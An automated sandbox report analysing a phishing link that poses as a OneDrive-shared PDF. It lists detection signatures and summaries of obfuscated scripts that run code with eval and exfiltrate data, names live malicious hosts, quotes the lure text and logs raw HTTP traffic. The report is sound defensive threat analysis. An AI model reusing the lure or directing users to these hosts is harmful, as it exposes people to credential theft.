Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://app.alayna.us/share/r/RM0eszjvKf

Overview

General Information

Sample URL:https://app.alayna.us/share/r/RM0eszjvKf
Analysis ID:1624163
Infos:

Detection

HTMLPhisher, Invisible JS
Score:76
Range:0 - 100
Confidence:100%

Signatures

Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Phishing site or detected (based on various text indicators)
HTML page contains hidden javascript code
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6852 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 7076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2020,i,8083160101863709475,10945907366538718763,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 4256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://app.alayna.us/share/r/RM0eszjvKf" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_262JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    0.28.id.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
      0.28.id.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
        2.8.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
          2.8.pages.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
            2.10.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
              Click to see the 1 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: Yara matchFile source: dropped/chromecache_262, type: DROPPED
              Source: Yara matchFile source: 0.28.id.script.csv, type: HTML
              Source: Yara matchFile source: 2.8.pages.csv, type: HTML
              Source: Yara matchFile source: 2.10.pages.csv, type: HTML
              Source: Yara matchFile source: 0.28.id.script.csv, type: HTML
              Source: Yara matchFile source: 2.8.pages.csv, type: HTML
              Source: Yara matchFile source: 2.10.pages.csv, type: HTML
              Source: https://app.alayna.us/share/r/RM0eszjvKfJoe Sandbox AI: Page contains button: 'VIEW PDF ONLINE' Source: '1.2.pages.csv'
              Source: 0.27.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://es.urboydaudi.com/ZxoLb/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be attempting to execute malicious code and collect sensitive user data, which is a clear indication of malicious intent.
              Source: 0.33.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://es.urboydaudi.com/ZxoLb/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It uses the `atob()` function to decode a base64-encoded HTML string and writes it to the document, which could potentially execute arbitrary code. Additionally, it collects user data and sends it to an external server, which is a concerning data exfiltration behavior. The script also contains obfuscated code and URLs, further increasing the risk. While the script may have a legitimate purpose, the overall behavior is highly suspicious and poses a significant security risk.
              Source: 0.28.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://es.urboydaudi.com/ZxoLb/... This script demonstrates high-risk behaviors, including dynamic code execution via the `eval` function and potential data exfiltration. The use of obfuscated code and multiple fallback domains further increases the risk. Overall, this script exhibits a high level of malicious intent and should be treated with caution.
              Source: Chrome DOM: 1.3OCR Text: Try Alayna PALMERWW PORTAL Duplicate Doc OneDrive for Business A PDF Document has been shared with you via Onedrive for Business. Click on "View PDF Online" below to access. VIEW PDF ONLINE Best regards, Tim Plaster
              Source: https://ewr1.vultrobjects.com/palmerww/index.htmlHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Food Blog</title> <style> body { font-family: 'Dancing Script', cursive; ...
              Source: https://app.alayna.us/share/r/RM0eszjvKfHTTP Parser: No favicon
              Source: https://app.alayna.us/share/r/RM0eszjvKfHTTP Parser: No favicon
              Source: https://app.alayna.us/share/r/RM0eszjvKfHTTP Parser: No favicon
              Source: https://ewr1.vultrobjects.com/palmerww/index.htmlHTTP Parser: No favicon
              Source: https://ewr1.vultrobjects.com/palmerww/index.htmlHTTP Parser: No favicon
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: global trafficHTTP traffic detected: GET /share/r/RM0eszjvKf HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /client/assets/index.DAq5dCaE.css HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://app.alayna.us/share/r/RM0eszjvKfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /client/assets/index.CmaSzYmM.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://app.alayna.us/share/r/RM0eszjvKfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /npm/slick-carousel@1.8.1/slick/slick.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://app.alayna.us/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /index.tsx HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://app.alayna.us/share/r/RM0eszjvKfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /npm/slick-carousel@1.8.1/slick/slick-theme.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://app.alayna.us/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/draft-js/0.7.0/Draft.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://app.alayna.us/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /index.tsx HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /client/assets/index.CmaSzYmM.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /js/sdk.js HTTP/1.1Host: do.featurebase.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.alayna.us/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /client/assets/ErrorBoundary.BPkKvPXm.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://app.alayna.us/client/assets/index.CmaSzYmM.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /client/assets/ErrorBoundary.BPkKvPXm.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/index.hMOnG-tb.css HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://app.alayna.us/share/r/RM0eszjvKfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/index.CpbEpqIL.css HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://app.alayna.us/share/r/RM0eszjvKfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/Layout.mRBQSVK9.css HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://app.alayna.us/share/r/RM0eszjvKfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/Layout.WVpeZX22.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/Modal.Bgpq4lFm.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/index.KaME38Zl.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /js/sdk.js HTTP/1.1Host: do.featurebase.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /client/assets/index.CLF8hfvb.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/Modal.Bgpq4lFm.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/index.D1TXq2aj.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/ExclamationTriangleIcon.BNGKdN9E.js HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.alayna.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/Layout.WVpeZX22.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/imgs/favicon-askalayna.svg HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.alayna.us/share/r/RM0eszjvKfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/sw.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://app.alayna.us/share/r/RM0eszjvKfUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/index.KaME38Zl.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/assets/index.CLF8hfvb.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/imgs/favicon-askalayna.svg HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
              Source: global trafficHTTP traffic detected: GET /client/manifest.webmanifest HTTP/1.1Host: app.alayna.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://app.alayna.us/share/r/RM0eszjvKfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /client/assets/index.D1TXq2aj.js HTTP/1.1Host: app.alayna.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.156416517.1740518399; _ga_XL5BHTM4BS=GS1.1.1740518399.1.0.1740518399.0.0.0
